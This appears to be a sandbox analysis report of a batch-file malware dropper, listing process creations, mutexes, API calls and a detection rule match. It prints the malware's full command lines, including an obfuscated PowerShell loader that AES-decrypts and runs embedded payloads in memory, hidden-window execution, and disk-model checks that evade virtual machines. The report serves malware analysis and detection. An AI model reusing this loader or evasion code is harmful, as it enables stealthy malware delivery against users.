Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B38842A	38_2_00007FFB4B38842A
Source: C:\Windows\System32\conhost.exe	Code function: 39_3_000001FE3A94CC94	39_3_000001FE3A94CC94
Source: C:\Windows\System32\conhost.exe	Code function: 39_3_000001FE3A94CE18	39_3_000001FE3A94CE18
Source: C:\Windows\System32\conhost.exe	Code function: 39_3_000001FE3A9423F0	39_3_000001FE3A9423F0
Source: C:\Windows\System32\dllhost.exe	Code function: 40_3_000001C03F6E23F0	40_3_000001C03F6E23F0
Source: C:\Windows\System32\dllhost.exe	Code function: 40_3_000001C03F6ECC94	40_3_000001C03F6ECC94
Source: C:\Windows\System32\dllhost.exe	Code function: 40_3_000001C03F6ECE18	40_3_000001C03F6ECE18
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_0000000140001CF0	40_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_0000000140002D4C	40_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_0000000140003204	40_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_0000000140002434	40_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_0000000140001274	40_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401CDA18	40_2_000001C0401CDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401C2FF0	40_2_000001C0401C2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401CD894	40_2_000001C0401CD894
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401FDA18	40_2_000001C0401FDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401F2FF0	40_2_000001C0401F2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401FD894	40_2_000001C0401FD894
Source: C:\Windows\System32\winlogon.exe	Code function: 41_3_000002E99172CE18	41_3_000002E99172CE18
Source: C:\Windows\System32\winlogon.exe	Code function: 41_3_000002E9917223F0	41_3_000002E9917223F0
Source: C:\Windows\System32\winlogon.exe	Code function: 41_3_000002E99172CC94	41_3_000002E99172CC94
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E991752FF0	41_2_000002E991752FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99175D894	41_2_000002E99175D894
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99175DA18	41_2_000002E99175DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E991782FF0	41_2_000002E991782FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99178D894	41_2_000002E99178D894
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99178DA18	41_2_000002E99178DA18
Source: C:\Windows\System32\lsass.exe	Code function: 42_3_00000213BDCBCC94	42_3_00000213BDCBCC94
Source: C:\Windows\System32\lsass.exe	Code function: 42_3_00000213BDCB23F0	42_3_00000213BDCB23F0
Source: C:\Windows\System32\lsass.exe	Code function: 42_3_00000213BDCBCE18	42_3_00000213BDCBCE18
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_00000158709A23F0	43_3_00000158709A23F0
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_00000158709ACC94	43_3_00000158709ACC94
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_00000158709ACE18	43_3_00000158709ACE18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_00000158709D2FF0	43_2_00000158709D2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_00000158709DD894	43_2_00000158709DD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_00000158709DDA18	43_2_00000158709DDA18
Source: C:\Windows\System32\dwm.exe	Code function: 44_3_0000026DB163CE18	44_3_0000026DB163CE18
Source: C:\Windows\System32\dwm.exe	Code function: 44_3_0000026DB16323F0	44_3_0000026DB16323F0
Source: C:\Windows\System32\dwm.exe	Code function: 44_3_0000026DB163CC94	44_3_0000026DB163CC94
Source: C:\Windows\System32\dwm.exe	Code function: 44_3_0000026DB160CE18	44_3_0000026DB160CE18
Source: C:\Windows\System32\dwm.exe	Code function: 44_3_0000026DB16023F0	44_3_0000026DB16023F0
Source: C:\Windows\System32\dwm.exe	Code function: 44_3_0000026DB160CC94	44_3_0000026DB160CC94
Source: C:\Windows\System32\svchost.exe	Code function: 45_3_000002A3EFFCCE18	45_3_000002A3EFFCCE18
Source: C:\Windows\System32\svchost.exe	Code function: 45_3_000002A3EFFCCC94	45_3_000002A3EFFCCC94
Source: C:\Windows\System32\svchost.exe	Code function: 45_3_000002A3EFFC23F0	45_3_000002A3EFFC23F0
Source: C:\Windows\System32\svchost.exe	Code function: 45_2_000002A3F0662FF0	45_2_000002A3F0662FF0
Source: C:\Windows\System32\svchost.exe	Code function: 45_2_000002A3F066D894	45_2_000002A3F066D894
Source: C:\Windows\System32\svchost.exe	Code function: 45_2_000002A3F066DA18	45_2_000002A3F066DA18

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7720 -s 2392

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2679
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682
Source: unknown	Process created: Commandline size = 5684
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2679	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 7720, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spyw.evad.winCMD@54/91@2/2

Source: C:\Windows\System32\dllhost.exe

Code function: 40_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,

40_2_0000000140002D4C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 37_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

37_2_004011AD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 37_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,

37_2_004017A5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\9590544
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7080
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\942558
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7720
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\3288062

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3xmlhmq.zg3.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: WMIC.exe, 00000017.00000003.1695574272.000002A260EAD000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000002.1698169437.000002A260EB0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000003.1697303203.000002A260EB0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000003.1696954523.000002A260EAD000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SELECT Manufacturer, Model FROM Win32_DiskDrive;

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1 (2).cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7720 -s 2392
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7080 -s 2400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7080 -s 2172
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); 